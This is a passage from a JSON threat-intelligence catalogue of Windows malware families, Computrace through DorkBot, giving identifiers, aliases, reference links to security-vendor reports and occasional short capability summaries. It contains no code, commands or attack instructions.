"https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research" ], "synonyms": [ "lojack" ], "type": [] }, "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", "value": "Computrace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", "https://twitter.com/struppigel/status/816926371867926528" ], "synonyms": [], "type": [] }, "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", "value": "ComradeCircle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", "value": "concealment_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", "https://www.honeynet.org/files/KYE-Conficker.pdf", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", "https://github.com/tillmannw/cnfckr", "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ "downadup", "traffic converter" ], "type": [] }, "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", "value": "Conficker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [], "type": [] }, "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", "value": "Confucius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", "value": "Contopee" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", "value": "CookieBag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" ], "synonyms": [], "type": [] }, "uuid": "495377c4-1be5-4c65-ba66-94c221061415", "value": "Corebot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html", "http://malware.prevenity.com/2014/08/malware-info.html" ], "synonyms": [], "type": [] }, "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", "value": "Coreshell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" ], "synonyms": [], "type": [] }, "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", "value": "CradleCore" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" ], "synonyms": [ "Crash", "Industroyer" ], "type": [] }, "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", "value": "CrashOverride" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", "value": "Credraptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" ], "synonyms": [], "type": [] }, "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", "value": "Crenufs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], "synonyms": [], "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", "value": "Crimson" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" ], "synonyms": [], "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", "value": "Crisis (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://hackmag.com/security/ransomware-russian-style/", "https://twitter.com/demonslay335/status/971164798376468481", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx" ], "synonyms": [], "type": [] }, "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", "value": "Cryakl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" ], "synonyms": [], "type": [] }, "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", "value": "CryLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] }, "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", "value": "CrypMic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" ], "synonyms": [], "type": [] }, "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", "value": "Crypt0l0cker" }, { "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.secureworks.com/research/cryptolocker-ransomware" ], "synonyms": [], "type": [] }, "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", "value": "CryptoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" ], "synonyms": [], "type": [] }, "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", "value": "CryptoLuck" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/" ], "synonyms": [ "CryptFile2" ], "type": [] }, "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", "value": "CryptoMix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", "https://twitter.com/struppigel/status/810770490491043840" ], "synonyms": [], "type": [] }, "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", "value": "Cryptorium" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", "value": "CryptoShield" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" ], "synonyms": [], "type": [] }, "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", "value": "CryptoShuffler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" ], "synonyms": [], "type": [] }, "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", "value": "Cryptowall" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" ], "synonyms": [], "type": [] }, "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", "value": "CryptoWire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" ], "synonyms": [], "type": [] }, "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", "value": "CryptoFortress" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", "https://twitter.com/JaromirHorejsi/status/818369717371027456" ], "synonyms": [], "type": [] }, "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", "value": "CryptoRansomeware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] }, "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", "value": "CryptXXXX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", "value": "CsExt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451", "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" ], "synonyms": [ "Windshield?" ], "type": [] }, "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", "value": "Cuegoe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" ], "synonyms": [], "type": [] }, "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", "value": "Cueisfry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" ], "synonyms": [], "type": [] }, "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", "value": "Cutlet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" ], "synonyms": [], "type": [] }, "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", "value": "Cutwail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ "Rebhip" ], "type": [] }, "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", "value": "CyberGate" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" ], "synonyms": [], "type": [] }, "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", "value": "CyberSplitter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" ], "synonyms": [], "type": [] }, "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", "value": "CycBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", "value": "Dairy" }, { "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" ], "synonyms": [], "type": [] }, "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", "value": "DanaBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", "https://darkcomet.net", "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" ], "synonyms": [ "Fynloski", "klovbot" ], "type": [] }, "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", "value": "DarkComet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html", "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html" ], "synonyms": [], "type": [] }, "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", "value": "DarkMegi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" ], "synonyms": [ "Chymine" ], "type": [] }, "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", "value": "Darkmoon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", "value": "DarkPulsar" }, { "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" ], "synonyms": [], "type": [] }, "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", "value": "DarkShell" }, { "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", "http://telegra.ph/Analiz-botneta-DarkSky-12-30", "https://blog.radware.com/security/2018/02/darksky-botnet/", "https://github.com/ims0rry/DarkSky-botnet" ], "synonyms": [], "type": [] }, "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", "value": "Darksky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" ], "synonyms": [], "type": [] }, "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", "value": "DarkStRat" }, { "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", "https://securelist.com/dark-tequila-anejo/87528/" ], "synonyms": [], "type": [] }, "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", "value": "DarkTequila" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" ], "synonyms": [], "type": [] }, "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", "value": "Darktrack RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/" ], "synonyms": [ "Muirim", "Nioupale" ], "type": [] }, "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", "value": "Daserf" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" ], "synonyms": [], "type": [] }, "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", "value": "Datper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", "value": "DDKONG" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" ], "synonyms": [], "type": [] }, "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", "value": "Decebal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" ], "synonyms": [], "type": [] }, "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", "value": "Delta(Alfa,Bravo, ...)" }, { "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" ], "synonyms": [], "type": [] }, "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", "value": "Dented" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" ], "synonyms": [], "type": [] }, "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", "value": "DeputyDog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", "https://twitter.com/struppigel/status/812601286088597505" ], "synonyms": [], "type": [] }, "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", "value": "DeriaLock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" ], "synonyms": [], "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", "value": "Derusbi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" ], "synonyms": [], "type": [] }, "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", "value": "Devil's Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/" ], "synonyms": [ "LusyPOS" ], "type": [] }, "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", "value": "Dexter" }, { "description": "According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.\r\n\r\nOnce they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" ], "synonyms": [ "Arena", "Crysis" ], "type": [] }, "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", "value": "Dharma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://www.scmagazine.com/inside-diamondfox/article/578478/", "https://blog.cylance.com/a-study-in-bots-diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/" ], "synonyms": [ "Crystal", "Gorynch", "Gorynych" ], "type": [] }, "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", "value": "DiamondFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" ], "synonyms": [], "type": [] }, "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", "value": "Dimnie" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" ], "synonyms": [], "type": [] }, "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" ], "synonyms": [], "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", "value": "DistTrack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" ], "synonyms": [], "type": [] }, "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", "value": "DMA Locker" }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" ], "synonyms": [], "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", "value": "DNSMessenger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" ], "synonyms": [], "type": [] }, "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438", "value": "DNSpionage" }, { "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" ], "synonyms": [ "Shelma" ], "type": [] }, "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", "value": "DogHousePower" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", "https://research.checkpoint.com/dorkbot-an-investigation/", 